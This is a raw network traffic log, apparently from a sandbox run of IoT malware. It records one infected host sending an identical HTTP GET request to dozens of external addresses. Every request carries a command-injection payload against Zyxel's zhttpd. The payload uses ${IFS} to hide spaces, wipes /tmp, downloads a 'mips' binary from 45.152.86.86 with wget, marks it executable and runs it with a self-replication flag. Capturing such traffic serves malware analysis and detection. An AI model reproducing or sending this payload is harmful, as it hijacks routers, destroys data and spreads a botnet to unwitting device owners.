                              Mar 31, 2024 08:42:16.476381063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9137192.168.2.1352182168.218.104.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476433039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9138192.168.2.1332894163.7.164.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476459980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9139192.168.2.134097679.203.250.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476494074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9140192.168.2.135667883.157.4.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476535082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9141192.168.2.133532080.34.57.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476582050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9142192.168.2.1354402175.189.65.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476613998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9143192.168.2.13440384.19.90.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476650000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9144192.168.2.1333670113.71.168.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476703882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9145192.168.2.1351672148.191.253.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476727962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9146192.168.2.1334584209.253.19.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476789951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9147192.168.2.1338118191.143.192.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476866961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9148192.168.2.134244831.109.139.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476919889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9149192.168.2.1360832201.117.245.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476953030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9150192.168.2.1349686187.130.242.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476979017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9151192.168.2.1341062180.17.182.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477016926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9152192.168.2.13587444.155.168.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477072001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9153192.168.2.1360168204.175.102.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477117062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9154192.168.2.1336052147.6.225.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477150917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9155192.168.2.1353984123.98.229.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477210045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9156192.168.2.1333138180.193.56.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477237940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9157192.168.2.135330825.89.167.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477318048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9158192.168.2.133430844.146.242.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477370024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9159192.168.2.135122020.11.11.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477426052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9160192.168.2.1348402188.144.173.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477451086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9161192.168.2.135347617.100.36.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477478027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9162192.168.2.1332880101.109.1.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477528095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9163192.168.2.1338040205.36.188.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477575064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9164192.168.2.1333330219.241.244.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477615118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9165192.168.2.1354494176.30.193.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477659941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9166192.168.2.1344196106.80.66.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477705002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9167192.168.2.1355598183.18.94.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477760077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9168192.168.2.1356264197.139.37.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477803946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9169192.168.2.1339240106.220.8.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477845907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9170192.168.2.1339504134.142.14.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477880955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9171192.168.2.1349274115.102.34.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477961063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9172192.168.2.135609846.111.160.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.477988005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9173192.168.2.1354440159.107.77.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478041887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9174192.168.2.134901447.33.219.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478094101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9175192.168.2.1333190156.71.232.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478137016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9176192.168.2.1341582170.117.46.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478208065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9177192.168.2.135073051.160.213.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478257895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9178192.168.2.1348006219.225.209.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478302002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9179192.168.2.135732484.212.171.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478351116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9180192.168.2.1359280150.19.178.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478394032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9181192.168.2.1360892170.51.115.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478465080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9182192.168.2.1341024123.93.194.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478501081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9183192.168.2.133581269.233.53.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478554010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9184192.168.2.1338914121.2.106.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478593111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9185192.168.2.135756692.43.94.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478615046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9186192.168.2.133891860.193.81.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478661060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9187192.168.2.1353434140.110.108.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478733063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9188192.168.2.135498064.47.36.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478775978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9189192.168.2.1337044196.74.17.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478800058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9190192.168.2.1347714169.44.186.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478861094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9191192.168.2.1350728192.122.48.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478903055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9192192.168.2.136012042.82.111.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.478977919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9193192.168.2.1334680191.246.162.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479032040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9194192.168.2.133528644.99.7.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479096889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9195192.168.2.1337888154.158.157.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479147911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9196192.168.2.1332906216.41.183.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479181051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9197192.168.2.1352880222.212.15.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479235888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9198192.168.2.1335878146.112.45.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479286909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9199192.168.2.1337650119.242.212.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479341030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9200192.168.2.135039842.56.32.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479372025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9201192.168.2.1340068196.32.210.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479420900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9202192.168.2.133455483.214.5.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479461908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9203192.168.2.1335436125.92.136.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479510069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9204192.168.2.1336552122.137.188.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479537964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9205192.168.2.133603445.56.244.6443
                              TimestampBytes transferredDirectionData
